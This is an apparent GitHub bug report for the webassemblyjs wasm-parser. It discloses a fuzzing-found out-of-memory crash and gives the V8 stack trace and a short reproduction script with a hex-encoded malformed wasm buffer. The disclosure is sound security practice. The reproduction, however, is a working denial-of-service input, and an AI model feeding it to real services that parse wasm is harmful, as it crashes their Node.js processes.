webassemblyjs
webassemblyjs copied to clipboard
xtuc
[wasm-parser] Bug leading to OOM/DoS
Hi,
During fuzzing with jsfuzz, i found the following bug leading to a memory OOM i.e. DoS of nodejs process:
Error:
$ nodejs crash_wasm_parser_OOM.js
<--- Last few GCs --->
[21833:0x3ed48c0] 1757 ms: Scavenge 1150.1 (1182.9) -> 1150.1 (1182.9) MB, 55.5 / 0.0 ms (average mu = 1.000, current mu = 1.000) allocation failure
[21833:0x3ed48c0] 3055 ms: Mark-sweep 1723.9 (1756.7) -> 1711.0 (1744.6) MB, 507.4 / 0.0 ms (+ 38.5 ms in 11 steps since start of marking, biggest step 5.7 ms, walltime since start of marking 2873 ms) (average mu = 1.000, current mu = 1.000) allocati
<--- JS stacktrace --->
==== JS stack trace =========================================
0: ExitFrame [pc: 0x1374fd9]
Security context: 0x06c8e73808a1 <JSObject>
1: push [0x6c8e7391079](this=0x1b11adcdc4a1 <JSArray[112813858]>,0x249ba0fc04a9 <undefined>)
2: readBytesAtOffset(aka readBytesAtOffset) [0x1b11adcdc661] [/XXX/node_modules/@webassemblyjs/wasm-parser/lib/decoder.js:~125] [pc=0x394ada845390](this=0x249ba0fc04a9 <undefined>,17,136278235)
3: readUTF8String(aka re...
FATAL ERROR: invalid array length Allocation failed - JavaScript heap out of memory
Reproduction
const parser = require("@webassemblyjs/wasm-parser");
buf = Buffer.from('0061736d010000000100000040dbe1fd40db01fe331a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a5e1a1a1a1a1a1a1a', 'hex')
parser.decode(buf, {});
The module bytecode is not a valid wasm module so it should be reject instead.
